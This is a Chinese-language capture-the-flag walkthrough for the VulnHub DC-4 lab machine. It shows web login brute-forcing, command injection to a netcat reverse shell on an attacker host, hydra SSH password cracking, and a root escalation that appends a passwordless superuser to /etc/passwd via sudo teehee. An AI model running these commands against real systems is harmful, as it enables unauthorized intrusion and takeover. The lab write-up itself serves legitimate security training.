下載地址：https://www.vulnhub.com/entry/dc-4,313/

掃描IP地址

arp-sacn -l

掃描端口，開啟了80和22端口

nmap -p- 192.168.112.140

訪問80端口

掃描目錄，并沒有發現敏感目錄

嘗試爆破

爆破成功，用戶名admin 密碼happy

登錄成功

里面是已經執行的三個命令，

ls -l

du -h

df -h

既然可以執行命令，那就可以嘗試抓包來修改命令

成功執行whoami

嘗試寫一句話木馬進去，但是我們的php代碼被過濾了

換一種方式，嘗試反彈shell

nc+192.168.112.132+4444+-e+/bin/bash

成功反彈

接下來就是提權

先看一下版本信息

uname -a

并沒有可以利用的腳本

之前nmap掃出有22端口，那可以看一下/home目錄下的用戶

在jim目錄下面找到了一些文件，

jim目錄下面有一個文件夾和兩個文件，mbox沒有權限，test.sh不知道寫的啥

只有backups目錄下面有一個舊密碼備份，這里面應該就有jim的ssh密碼

使用hydra爆破一下,將密碼字典復制到kali，新建文本文件ps.txt作為hydra的爆破字典

hydra -l jim -P ./ps.txt 192.168.10.150 ssh

得到jim的密碼為 jibril04

使用ssh成功登錄到jim用戶

jim目錄權限可以查看mbox文件

里面提示我們在/var/emi里面有一封郵件

郵件內容是我們的另一個用戶charles發給jim的，里面有他的密碼^xHhA&hvim0y

切換到charles用戶，查看一下sudo授權

發現可以無密碼執行/usr/bin/teehee

teehee命令可以往一個文件追加內容，可以通過它向/etc/passwd寫入內容，新增一個超級用戶

向passwd文件中追加一個超級用戶

echo "hack::0:0:::/bin/bash" | sudo teehee -a  /etc/passwd

成功提權，找到flag